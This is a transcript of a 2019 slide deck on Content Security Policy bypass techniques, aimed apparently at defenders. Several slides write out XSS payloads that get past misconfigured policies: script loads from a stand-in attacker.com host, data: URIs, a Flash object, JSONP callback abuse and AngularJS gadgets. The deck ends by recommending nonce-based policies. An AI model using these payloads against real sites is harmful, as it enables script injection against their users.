Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Content Security Policy bypass techniques

Artur Hil
September 25, 2019

Content Security Policy bypass techniques

Artur Hil

September 25, 2019
Tweet

More Decks by Artur Hil

Other Decks in Programming

Transcript

  1. What the hell is this? Content Security Policy (CSP) is

    a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks resulting from execution of malicious content in the trusted web page context.
  2. Yay! We don’t need any input validation now! to prevent

    XSS clickjacking code injection attacks
  3. Actually, NO CSP provides a standard method for website owners

    to declare approved origins of content that browsers should be allowed to load on that website
  4. Ambitious goals of CSP Mitigate risk Control over resources Control

    over execution Reduce privilege of the application Content is forced into a unique origin Detect exploitation by monitoring violations Collecting violating reports
  5. CSP directives… Many for many different problems media-src base-uri font-src

    plugin-types connect-src base-uri style-src script-src child-src report-to navigate-to form-action sandbox script-src-elem prefetch-src worker-src
  6. How does it work? example.com <img src=”cat.jpg”> <script src=” //good.com/dog.js”>

    CSP default-src ‘self’; script-src ‘self’ good.com; report-uri /csp_alert_logger; example.com good.com
  7. How does it work? example.com <img src=”cat.jpg”> <script src=” //good.com/dog.js”>

    CSP default-src ‘self’; script-src ‘self’ good.com; report-uri /csp_alert_logger; example.com good.com “>’><script src=” //attacker.com/evil.js”> “>’><script>alert(balalaya) </script> example.com/csp_alert_logger source not whitelisted inline scripts are not allowed
  8. I deployed CSP! Now I’m in safe! Not exactly, trivial

    mistake #1 script-src ‘self’ ‘unsafe-inline’; object-src ‘none’; ‘unsafe-inline’ in script-src instead of ‘nonce’ Same for ‘default-src’ if script-src directive is not set “>’><script> alert(12345)</script> Bypass:
  9. I deployed CSP! Now I’m in safe! Not exactly trivial

    mistake #2 script-src ‘self’ https: data: *; object-src ‘none’; URL shhemes or wildcard in script-src instead of ‘unsafe-dynamic’ Same for URL schemes and wildcard in ‘object-src’ “>’><script src=https://attacker.com/evil.js> </script> Bypass: “>’><script src=data:text/javascript,alert(12345)></script>
  10. I deployed CSP! Now I’m in safe! Not exactly trivial

    mistake #3 script-src ‘self’; Look’s secure, but… Missing object-src or default-src directive “>’><object type=”application/x-shockwavw-flash” data=’https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/c harts/assets/charts.swf?allowedDomain=\”})))}catch(e) {alert(12345)}//’><param name=”AllowScriptAccess” value=”always”></object> Bypass:
  11. I deployed CSP! Now I’m in safe! Not exactly trivial

    mistake #4 script-src ‘self’; object-src ‘none’; Allow ‘self’ + hosting use-provided content on the name origin Same for object-src or default-src directive “>’><script src=”/user_upload/evil_cat.jpg.js”</script> Bypass:
  12. Whitelisting JSONP is a problem script-src ‘self’ https://whitelisted.com; object-src ‘none’;

    JSONP-like endpoint in whitelist “>’><script src=”https://whitelisted.com/jsonp?callback=alert”> Bypass:
  13. Whitelisting JSONP is a problem CSP script-src ‘self’ https://whitelisted.com; object-src

    ‘none’; alert(12345);u({...}) x.click({...}) “>’><script src=”https://whitelisted.com /jsonp?callback=alert(12345);u”> “>’><script src=”https://whitelisted.com /jsonp?callback=x.click”> Bypass: Don't whitelist JSONP endpoints!
  14. Angular JS library in Whitelist script-src ‘self’ https://whitelisted.com; object-src ‘none’;

    “>’><script src=”https://whitelisted.com/angular.min.js”></script> <div ng-app ng-csp>{{2+2}}</div> “>’><script src=”https://whitelisted.com/angularjs/1.1.3/angular.min.js”></script> <div ng-app ng-csp id=p ng-click=$event.view.alert(4) Bypass: Also works without user interaction - combining with JSONP endpoints or other JS libraries
  15. Best way to make CSP safe script-src ‘nonce-r4nd0m123’ object-src ‘none’;

    Benefits: All <script> tags with correct nonce attribute will be executed <script> tags injected via XSS will be blocked because of missing nonce No host/path whitelists! --> NO BYPASSES
  16. How does nonce work? example.com <img src=”cat.jpg”> <script nonce=”r4nd0m123” src=”

    //some.site/dog.js”> CSP default-src ‘self’; script-src ‘self’ nonce-r4and0m123; report-uri /csp_alert_logger; example.com good.com “>’><script src=” //attacker.com/evil.js”> “>’><script>alert(balalaya) </script> example.com/csp_alert_logger script without correct nonce
  17. A New way to make CSP script-src ‘nonce-r4nd0m123’ ‘unsafe-dynamic’; object-src

    ‘none’; • nonce-r4nd0m - Allows all scripts to execute if the correct nonce is set. • unsafe-dynamic - Propagates trust and discards whitelists CSP V.3